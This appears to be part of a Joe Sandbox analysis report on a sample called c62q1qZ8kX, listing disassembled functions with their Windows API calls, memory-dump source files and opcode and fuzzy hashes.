                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: b5fa9869388136ef28248fb4166602c851817f99a1394f2203613d9fc2c2880f
                • Instruction ID: 525b6712a16e30282f5a37fdfd4805fcb32c2b5e664e2e57c9c8e1dedbc1d692
                • Opcode Fuzzy Hash: b5fa9869388136ef28248fb4166602c851817f99a1394f2203613d9fc2c2880f
                • Instruction Fuzzy Hash: 1901A1322043159B8B08CE69BC94D7FB399AFC5722B16462FE91787391CB759C059A21
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 001D9E76
                • GetLastError.KERNEL32 ref: 001D9E82
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: cba57e570ba86fbbf271687d01eab0e2f79bb03f7b19567f652930be724353ff
                • Instruction ID: 6e985985a0253088d1cc579fa4519dca4eb83fb0ec1f440d7e8ee7ba85db0749
                • Opcode Fuzzy Hash: cba57e570ba86fbbf271687d01eab0e2f79bb03f7b19567f652930be724353ff
                • Instruction Fuzzy Hash: 43015E717057006BEB34DF29DC89B6BB7D99B88319F144A3FB156C2790DB75EC888610
                APIs
                • _free.LIBCMT ref: 001F8627
                  • Part of subcall function 001F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001FC13D,00000000,?,001F67E2,?,00000008,?,001F89AD,?,?,?), ref: 001F854A
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00210F50,001DCE57,?,?,?,?,?,?), ref: 001F8663
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Heap$AllocAllocate_free
                • String ID:
                • API String ID: 2447670028-0
                • Opcode ID: 5b4172d4abf51f7a439a36aa74f08dad575a6bcb6f18af41510cf53ebc88da71
                • Instruction ID: c4092f9450de701ecd1421636e2a45396382e5d9b8226292c0e6fb53f047a3d4
                • Opcode Fuzzy Hash: 5b4172d4abf51f7a439a36aa74f08dad575a6bcb6f18af41510cf53ebc88da71
                • Instruction Fuzzy Hash: E1F0B43220551DAADB212B25AC05F7F376DEFE2BB0F254125FB14DA2A1DF30CC0195A5
                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 001E0915
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 001E091C
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 6775f1ccbda1e32c72849435433ebd34ac6dde02062de6286fe4e106d6157990
                • Instruction ID: 02437a6a7bac7bebfee3bd805ed0bd664d381efa7a21d44fd7c5f268f77d753a
                • Opcode Fuzzy Hash: 6775f1ccbda1e32c72849435433ebd34ac6dde02062de6286fe4e106d6157990
                • Instruction Fuzzy Hash: 79E09B32A11545ABBF0ACEA5AC044FF739EDB0C3187114179E80ED3103F774DD418660
                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001DA27A,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA458
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001DA27A,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA489
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: db90cfc35719f9541872fec2028075d45d7f849e1db6637b246b930a5e0e0f1a
                • Instruction ID: 903605fb12c98f5c7befd414521bff3cbf8ee505bd4a559f07a505ad30a1ec3e
                • Opcode Fuzzy Hash: db90cfc35719f9541872fec2028075d45d7f849e1db6637b246b930a5e0e0f1a
                • Instruction Fuzzy Hash: FDF0A03124120DBBDF01AF60DC45FDA376DBF04381F488056BC8886261DB72CAA8AA50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: f98b0c1e3ca2b2e5923ab952983036aaf97589f96f4cb359c32f2a8829680a67
                • Instruction ID: b3c1b36f96fdf8d3dbed8218e35107b3ed04eb92d54c6eb7876fad654953ebd2
                • Opcode Fuzzy Hash: f98b0c1e3ca2b2e5923ab952983036aaf97589f96f4cb359c32f2a8829680a67
                • Instruction Fuzzy Hash: 63F0E5715007887BEB11ABB1AC0BFEE3BADAB14745F040596B604931A2DF716A608B62
                APIs
                • DeleteFileW.KERNELBASE(?,?,?,001D984C,?,?,001D9688,?,?,?,?,00201FA1,000000FF), ref: 001DA13E
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,001D984C,?,?,001D9688,?,?,?,?,00201FA1,000000FF), ref: 001DA16C
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 02f06675c802ea8b69f7b04ba643ccaf9ac46b5e1a9acc70d2234b25f7f4dd95
                • Instruction ID: b2b7d34f70b83fc364b3f5542149ea33db4f5cc5f432fb6714115a2dd3bbad64
                • Opcode Fuzzy Hash: 02f06675c802ea8b69f7b04ba643ccaf9ac46b5e1a9acc70d2234b25f7f4dd95
                • Instruction Fuzzy Hash: 31E09235641209ABDB11EF60EC45FE9779CBF08381F884066B888C3161DB61DD94EA90
                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,00201FA1,000000FF), ref: 001EA3D1
                • CoUninitialize.COMBASE(?,?,?,?,00201FA1,000000FF), ref: 001EA3D6
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 1e361e05956f8101eb59bd1ee0659161b71bf1a77c0945f0bb8c2f619b7038f2
                • Instruction ID: 99ee65adeb681ec90ba29ac53637537d1af184a27eec83fda96780a052905a85
                • Opcode Fuzzy Hash: 1e361e05956f8101eb59bd1ee0659161b71bf1a77c0945f0bb8c2f619b7038f2
                • Instruction Fuzzy Hash: 89F0A032518655DFC700DB4CEC09B09FBACFB49B20F00436AF409837A1CB346C10CA80
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,001DA189,?,001D76B2,?,?,?,?), ref: 001DA1A5
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001DA189,?,001D76B2,?,?,?,?), ref: 001DA1D1
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 6551126faddf01468dd0347a5e6196ff77b249d43ef20ba47d092a02acf82efa
                • Instruction ID: 2457b7e6f86881ad038af5dce083c002b7822986a5d6b51289697e2ecd139e8f
                • Opcode Fuzzy Hash: 6551126faddf01468dd0347a5e6196ff77b249d43ef20ba47d092a02acf82efa
                • Instruction Fuzzy Hash: 4EE092365002289BDB20FB68DC09BD9B79CAB183E1F0042A2FD45E3291DB70DD449AE0
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001E00A0
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001DEB86,Crypt32.dll,00000000,001DEC0A,?,?,001DEBEC,?,?,?), ref: 001E00C2
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: a1616fee1281bccfa8987bf7e433abdcb624e36ad3b388059dc0079a330b66c7
                • Instruction ID: 059546ae6f5e6a3f7a5860ac037b7603530a99e9828bb07c5bfedddaac76a07b
                • Opcode Fuzzy Hash: a1616fee1281bccfa8987bf7e433abdcb624e36ad3b388059dc0079a330b66c7
                • Instruction Fuzzy Hash: 29E09B7550165C56CB21D695AC08FDA775CFF0C381F040055F504D3104D7709A40CBA0
                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001E9B30
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001E9B37
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: d31b14643c2ac05b6445eb8041f711ec6ee977152303df3a53310b8932dc6f8a
                • Instruction ID: 7a71f8be9abbce4c0aad521c3600218ba78069467ac18cb65589a200d863d465
                • Opcode Fuzzy Hash: d31b14643c2ac05b6445eb8041f711ec6ee977152303df3a53310b8932dc6f8a
                • Instruction Fuzzy Hash: E0E0ED71911619EBCB10DF99D501A9DB7ECEB08721F10805BED9593301E7B16E149B91
                APIs
                  • Part of subcall function 001F329A: try_get_function.LIBVCRUNTIME ref: 001F32AF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001F217A
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 001F2185
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: bfa5087132783d26b00b944a150b3d59fa602284f0bb1dc92427e4c0bcf822a8
                • Instruction ID: 428229a3719ae290f6ade92844e5699d16498e196c2afa2caed8737e2b418176
                • Opcode Fuzzy Hash: bfa5087132783d26b00b944a150b3d59fa602284f0bb1dc92427e4c0bcf822a8
                • Instruction Fuzzy Hash: 1BD0223920C30E24BE0CA7B07C420F82348A872BB03F00B46F730CA0D2EF718044B419
                APIs
                • DloadLock.DELAYIMP ref: 001EDC73
                • DloadProtectSection.DELAYIMP ref: 001EDC8F
                  • Part of subcall function 001EDE67: DloadObtainSection.DELAYIMP ref: 001EDE77
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Dload$Section$LockObtainProtect
                • String ID:
                • API String ID: 731663317-0
                • Opcode ID: 239346367de1145e2b627456b9efa278d428b306ef04b687e81ef76eff76037b
                • Instruction ID: 5209b505aef0cae761a6d7d91c81dd30a3f4c8426e2c9b1015fdf6f1aba2d7b6
                • Opcode Fuzzy Hash: 239346367de1145e2b627456b9efa278d428b306ef04b687e81ef76eff76037b
                • Instruction Fuzzy Hash: 02D01270100BD04EC215EB66BDDE75D32B0B714B85FB81A06F106C74E1DFF44491C626
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: fab1b5abe33b2b97fc1c2c5709074457abc6405161f626400be8c6db6b194fb0
                • Instruction ID: fa94457020664b308581cf7ceabbc9e348ac12b2e981554e2c897878fb07c1c6
                • Opcode Fuzzy Hash: fab1b5abe33b2b97fc1c2c5709074457abc6405161f626400be8c6db6b194fb0
                • Instruction Fuzzy Hash: 79C01232058200FECB010BB0ED0DD2FBBA8ABA4212F05C908B6E9C0061C238C018DB11
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: b68582b6415dac7bb0863b2efaeda98d43bf8dd26767591ac51a7d51559a293d
                • Instruction ID: 9723bb60cde894e71523c8569b018672289bb051bac0a3264510d094fa6b4d67
                • Opcode Fuzzy Hash: b68582b6415dac7bb0863b2efaeda98d43bf8dd26767591ac51a7d51559a293d
                • Instruction Fuzzy Hash: 2FC19030A04294BFEF15CF68C498BA97BA5AF1A314F1840BBEC45DB386DB359D44CB61
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 6dda19acf6427346cb69687f4fc8e4711bae5ffa2df44f637427d97c341f4097
                • Instruction ID: f2f0cd601284c684b0d8c28070b53b663f5d8a8aba75bdb4a33d7204e334fdaf
                • Opcode Fuzzy Hash: 6dda19acf6427346cb69687f4fc8e4711bae5ffa2df44f637427d97c341f4097
                • Instruction Fuzzy Hash: 4571BD71104F44AEDB25DB70CC91AEBB7E9AF24301F84496FE5AB47242DB316A48CF52
                APIs
                • __EH_prolog.LIBCMT ref: 001D8384
                  • Part of subcall function 001D1380: __EH_prolog.LIBCMT ref: 001D1385
                  • Part of subcall function 001D1380: new.LIBCMT ref: 001D13FE
                  • Part of subcall function 001D19A6: __EH_prolog.LIBCMT ref: 001D19AB
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: cc43e8264622850e267c2e3654dd32d83da1904746650fc8ff1a7489cb388450
                • Instruction ID: da7c8cc97265323713ec221640dde4980e0cce34c1278e17b1703a19230d8a73
                • Opcode Fuzzy Hash: cc43e8264622850e267c2e3654dd32d83da1904746650fc8ff1a7489cb388450
                • Instruction Fuzzy Hash: 5241B371940655AADF24EB60CC55BEAB3A8AF60304F0540EBE58AA3293DF745FC8DF50
                APIs
                • __EH_prolog.LIBCMT ref: 001D1E05
                  • Part of subcall function 001D3B3D: __EH_prolog.LIBCMT ref: 001D3B42
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 1a597e7f4c1aec59dcb266e374ab77a169831c68cad3827d50eac5b0185af66b
                • Instruction ID: 88201425d816160e6dba08e00d0c81278c2511f68b60002f6040d652cce1e05a
                • Opcode Fuzzy Hash: 1a597e7f4c1aec59dcb266e374ab77a169831c68cad3827d50eac5b0185af66b
                • Instruction Fuzzy Hash: 93213772944248AFCB15EF99D9419EEFBF6BF68300B10016EE845A7351CB325E10CB60
                APIs
                • __EH_prolog.LIBCMT ref: 001EA7C8
                  • Part of subcall function 001D1380: __EH_prolog.LIBCMT ref: 001D1385
                  • Part of subcall function 001D1380: new.LIBCMT ref: 001D13FE
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
